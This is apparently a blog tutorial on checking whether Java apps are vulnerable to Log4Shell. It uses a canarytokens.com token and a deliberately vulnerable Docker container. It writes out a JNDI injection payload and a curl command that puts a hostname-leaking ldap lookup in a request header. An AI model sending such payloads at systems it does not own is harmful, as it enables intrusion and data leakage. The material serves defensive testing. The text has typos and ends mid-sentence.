As you know Log4j vulnerability is a CVSS severity level 10 vulnerability and it allows attackers to receive inputs from another server or domain name using JNDI (Java Naming and Directory Interface). For the user to hack in just they need to type in a command like this – ${jndi:ldap://test.com/a}. But there are ways to test it to see whether your apps or servers are affected by this vulnerability. Follow the below steps to test your app for vulnerability (The below example includes a sample Docker container which has this vulnerability)
Updates (Important links):
- Tool to check your source files for Log4j Vulnerability
- Which Java versions are affected?
- How to Fix Log4j vulnerability
- What is Log4j vulnerability?
- Headers exploited in Log4j vulnerability
Steps to test your server for Log4j Vulnerability
Step 1: Go to canarytokens.com
Step 2: Type your email address and place where you are going to use the token
Step 3: Once the token is created, you will see a image like this
Step 4: Some one has created a Docker container which includes the log4j vulnerability and execute the docker app in your local by the below command
docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
You can see more about it over here – https://github.com/christophetd/log4shell-vulnerable-app (It has more detailed steps on how to execute it for a localhost)
Step 5: Once you run the docker container it will get started as shown below
Step 6: Now execute the canary token you just created in the Step 3 from another terminal as shown below
curl ServerName:Port -H "X-Api-ersion:${jndi:ldap://x${hostName}.L4J.79d6i83o60p1x6wq6516lgwu1.canarytokens.com/a}"
Now the canary tokens comes with hostname also. This would enable you to test your internal applications also. This is because if the application is vulnerable the canaryt oken email notification also would display the hostname.Once you have run this command, it will trigger a request to canary tokens website as well as you can see the request being sent in the Docker container you are running.
Step 7: And you would also get an email notification from Canary Tokens as shown below (Token reminder is very important as it would let you know where it got triggered from. I just kept it with a wrong spelling Webistes so I know where it got triggered from )
By following the above steps you can check whether your Java app is vulnerable or not. All you need to do is create a canary token and send a curl command via terminal to see what happens!
Update 12/13 | 5PM UTC: CanaryTokes now